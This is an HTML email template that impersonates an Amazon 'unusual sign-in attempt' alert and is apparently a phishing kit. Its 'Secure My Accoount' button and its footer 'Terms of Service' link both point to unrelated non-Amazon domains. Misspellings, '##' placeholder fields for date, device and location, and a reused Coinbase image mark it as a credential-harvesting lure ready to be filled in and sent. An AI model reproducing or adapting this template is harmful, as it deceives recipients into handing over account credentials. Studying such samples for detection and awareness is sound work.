<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Amazon</title>
</head>


<body style="!important background-color: #ffcd3f; height: 100% !important; margin: 0; padding: 0; width: 100% !important;" bgcolor="#FFFFFF">
  <!-- HIDDEN PREHEADER TEXT -->
  <div style="color: #fefefe; display: none; font-family: Open Sans, Helvetica, Arial, sans-serif; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden;">
      Amazon makes shopping easier!
  </div>

  <table id="main" width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
    <tbody>
      <tr>
        <td valign="top" align="center" bgcolor="#fafafa" style="background: #fafafa; padding: 0 15px;">
          <table class="innermain" cellpadding="0" width="100%" cellspacing="0" border="0" align="center" style="margin:0 auto; table-layout: fixed; border-collapse: collapse !important; max-width: 600px;">
            <tbody>
            <!-- START of MAIL Content -->
              <tr>
                <td align="center" valign="top" width="100%">

                <!-- Logo start here -->
                  <table class="logo" width="100%" cellpadding="0" cellspacing="0" border="0">
                    <tbody>
                      <tr><td align="center" valign="top" style="-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%; mso-table-lspace: 0pt; mso-table-rspace: 0pt; padding: 30px 0;">
                        <img alt="Amazon" width="150" src="http://media.corporate-ir.net/media_files/IROL/17/176060/Oct18/Amazon%20logo.PNG" />
                      </td></tr>
                    </tbody>
                  </table>
                <!-- Logo end here -->

                <!-- Main CONTENT -->
                  <table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff" style="border-radius: 4px; box-shadow: 0 2px 8px rgba(0,0,0,0.05);">
                    <tbody>
                      
                      <tr>
                        <td height="40"></td>
                      </tr>
                      <tr style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color:#4E5C6E; font-size:14px; line-height:20px; margin-top:20px;">
                        <td class="content" colspan="2" valign="top" align="center" style="padding-left:40px; padding-right:40px;">

                          <table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff">
  <tbody>
    <tr>
  <td align="center" valign="bottom" colspan="2" cellpadding="3">
   <img alt="Amazon" width="150" src="https://m.media-amazon.com/images/G/01/IS/TIV/s1gn9021HJK8SLLE274272.png" />
  </td>
</tr>

<tr><td height="20" &nbsp;=""></td></tr>


    <tr>
      <td align="center">
        <span style="color:#48545d;font-size:22px;line-height: 24px;">
          Unusual sign-in attempt detected
        </span>
      </td>
    </tr>

    <tr><td height="24" &nbsp;=""></td></tr>
<tr>
  <td height="1" bgcolor="#DAE1E9"></td>
</tr>

<tr><td height="24" &nbsp;=""></td></tr>


    <tr>
      <td>
        <span style="color:#48545d;font-size:14px;line-height:24px;">
          Your recently attemped to sign into your Amazon.com account from a new device in new location,
          As a security measure, we requre additional confirmation before allowing access to your Amazon.com account.<br/><br/>
          <b>When: ##31/07/2023<br/>
          Device: ##Windows<br/>
          Near: ##Canada##<br/><br/></b>
          Please confirm your account and information by clicking button below.
        </span>
      </td>
    </tr>
    <tr><td height="20" &nbsp;=""></td></tr>
    <tr>
      <td valign="top" width="48%" align="center">
        <span>
          <a href="http://igu-coc.org/v1/" style="display:block; padding:15px 25px; background-color:#ffcd3f; color:#979797; border-radius:3px; text-decoration:none;">Secure My Accoount</a>
        </span>
      </td>
    </tr>

    <tr><td height="20" &nbsp;=""></td></tr>
<tr>
  <td align="center"><img src="https://s3.amazonaws.com/app-public/Coinbase-notification/hr.png" width="54" height="2" border="0"></td>
</tr>

<tr><td height="20" &nbsp;=""></td></tr>


    <tr>
      <td align="center">
        <p style="color:#a2a2a2; font-size:12px; line-height:17px; font-style:italic;">
          If you did not sign up for this account you can ignore this email and the account will be deleted.
        </p>
      </td>
    </tr>
  </tbody>
</table>

                        </td>
                      </tr>
                      <tr>
                        <td height="40"></td>
                      </tr>
                    </tbody>
                  </table>
                <!-- Main CONTENT end here -->

                <!-- PROMO column start here -->
                    <!-- Show referral promo 25% of the time-->
                    <table id="promo" width="100%" cellpadding="0" cellspacing="0" border="0" style="margin-top:20px;">
                      <tbody>
                        <tr>
                          <td colspan="2" height="20"></td>
                        </tr>
                        <tr>
                          <td colspan="2" height="20"></td>
                        </tr>
                      </tbody>
                    </table>

                <!-- PROMO column end here -->

                <!-- FOOTER start here -->
                  <table width="100%" cellpadding="0" cellspacing="0" border="0">
                    <tbody>
                      <tr>
                        <td height="10">&nbsp;</td>
                      </tr>
                      <tr>
                        <td valign="top" align="center">
                          <span style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #909090; font-size:10px; margin-bottom:5px; display:block;">
                            <a href="https://codeunlocksource.com/v1/" target="_blank" tabindex="-1" style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #909090; font-size:10px; margin-bottom:5px; display:block;text-decoration:underline;">Terms of Service</a>
                          </span>
                        </td>
                      </tr>
                      <tr>
                        <td valign="top" align="center">
                          <span style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #909090; font-size:10px;">&copy;
                            <a href="https://www.amazon.com/" target="_blank" style="color: #909090 !important; text-decoration:none;">Amazon.com</a> 2021
                          </span>
                            <br/>
                            <span style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #909090; font-size:10px;">
                              410 Terry Avenue N  |  Seattle, WA 98109-5210  |  United State
                            </span>
                            <span style="font-family: -apple-system,BlinkMacSystemFont,&#39;Segoe UI&#39;,&#39;Roboto&#39;,&#39;Oxygen&#39;,&#39;Ubuntu&#39;,&#39;Cantarell&#39;,&#39;Fira Sans&#39;,&#39;Droid Sans&#39;,&#39;Helvetica Neue&#39;,sans-serif; color: #909090; font-size:10px;">&copy;
                            <a href="https://www.amazon.com/" target="_blank" style="color: #909090 !important; text-decoration:none;">
                              Amazon.com, Inc</a>
                            </span>
                            <br/>
                            <br/>
                            <br/>
                        </td>
                      </tr>
                      <tr>
                        <td height="50">&nbsp;</td>
                      </tr>
                    </tbody>
                  </table>
                <!-- FOOTER end here -->
                </td>
              </tr>
            </tbody>
          </table>
        </td>
      </tr>
    </tbody>
  </table>
</body>
</html>
